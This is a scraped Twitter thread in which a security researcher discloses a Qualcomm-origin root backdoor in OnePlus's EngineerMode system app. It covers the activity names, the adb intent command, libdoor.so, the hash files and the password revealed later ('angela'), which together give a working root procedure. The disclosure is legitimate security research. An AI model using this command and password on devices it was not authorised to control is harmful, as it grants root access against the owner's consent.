If you have an OnePlus device, I'm pretty sure you have this app pre-installed. To check open Settings -> Apps -> Menu -> Show system apps and search EngineerMode in the app list to check
-
-
Show this thread
-
With telephony secret code you can access to manual tests like GPS test, root status test as stated in this article https://www.xda-developers.com/oneplus-hardware-diagnostic-tests … pointed by
@AleGrechi . But can do better...pic.twitter.com/7gTaZ848Gp
Show this thread -
You can access to the "main" activity by sending this command: adb shell am start http://com.android .engineeringmode/.EngineeringMode You will have access to everything, not just the manual test.pic.twitter.com/UkwXPPmPDV
Show this thread -
Having access to all these functions is a real issue. Combined with this attack, http://researchcenter.paloaltonetworks.com/2017/09/unit42-android-toast-overlay-attack-cloak-and-dagger-with-no-permissions …, a malicious app can do a lot of thing.
Show this thread -
I will find time to make a POC. But it's not the biggest issue with this app.
Show this thread -
The DiagEnabled, which is a
@Qualcomm made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing no
?pic.twitter.com/iQFfam6eg6
Show this thread -
In the onCreate method if the intent is not null the escalatedUp method is called with the parameter enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going?pic.twitter.com/oa1i1NdlpU
Show this thread -
The escalatedUp method is calling Privilege.escalate(password) and if the result is true, it set the system property persist.sys.adbroot and oem.selinux.reload_policy to 1pic.twitter.com/92LeBfDPAv
Show this thread -
So yes, if you send the command: adb shell am start -n http://com.android .engineeringmode/.qualcomm.DiagEnabled --es "code" "password" with the correct code you can become root!
Show this thread -
Here the Privilege class. Check the name of native library used to check the code: door... Ladies and Gentlemen please say hi to the backdoor made in
@Qualcommpic.twitter.com/ns0JI1nvWD
Show this thread -
This lib is located in /system/lib/libdoor.so or /system/lib64/libdoor.so. You can find the sample here: https://www.virustotal.com/#/file/3e6df251ad4fe115563b51b302fec2d7836e14dd28ae06e8b41c1939d4bca33d …
Show this thread -
This is the interesting strings of the lib. After a first read we can see that libcrypto is used and the key and the password are backup in /data/backup/fpwd and /data/backup/fkeypic.twitter.com/Y0JbAk3Fp7
Show this thread -
This is the code responsible of the password verification. 1st it check the length, calculate the hash and compare it to the correct one.pic.twitter.com/efldDJO0Qu
Show this thread -
Unfortunately, I didn't find the password, so if some you are skilled in reversing native lib, your help is very welcome!
Show this thread -
If the verification is passed the password hash is stored in /data/backup/fpwdpic.twitter.com/lkcWlr7Wfb
Show this thread -
and the key is made from different build properties like http://ro.build .type, http://ro.build .user,... and stored in /data/backup/fkeypic.twitter.com/NMto5BY7zp
Show this thread -
Using
@fridadotre and the script attached, I managed to bypass the escalate and isEscalated methods and become rootpic.twitter.com/oXGGEIqFad
Show this thread -
Here the source code of the EngineerMode apk: https://github.com/fs0c131y/EngineerMode …. Feel free to dig on your own and share your findings!
Show this thread -
cc
@AndroidAuth@AndroidPolice@androidandme@Androidheadline@AndroidPolice@xdadevelopers@AndroidSPIN@Gadgets360@TheHackersNews you have a subject here to write an article. It's not normal to have this kind of backdoor in an end user product...Show this thread -
-
EngineerMode APK is not the only interesting app left by
@Oneplus. More thread to come :)Show this thread -
Awesome! Thanks to
@insitusec and the@NowSecureMobile team, we have the password! It's now possible to root an@Oneplus device with a simple intentpic.twitter.com/gN0awYijBv
Show this thread -
I will publish an application on the PlayStore to root your
@OnePlus device in the next hoursShow this thread -
Difficulty to install
#SuperSu: 0! Everything is already preinstalled
.
The OnePlus root application is coming soon :)Show this thread -
The best thing in this story is the password. It's angela (see the reference?). This backdoor is here intentionally. When the fiction become a reality. Good luck
@getpeid, you will need a very good explanation. cc@whoismrrobotpic.twitter.com/IJgsu6hCEcShow this thread -
My Twitter at the moment. Thank you all for the impact you give to this story!pic.twitter.com/vcKlSrHwnT
Show this thread -
I'm still waiting more samples to confirm but yes EngineerMode is installed on
@OnePlus 5T. The DiagEnabled activity is here, so the backdoor too :)Show this thread - 2 more replies
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
This app is a system app made by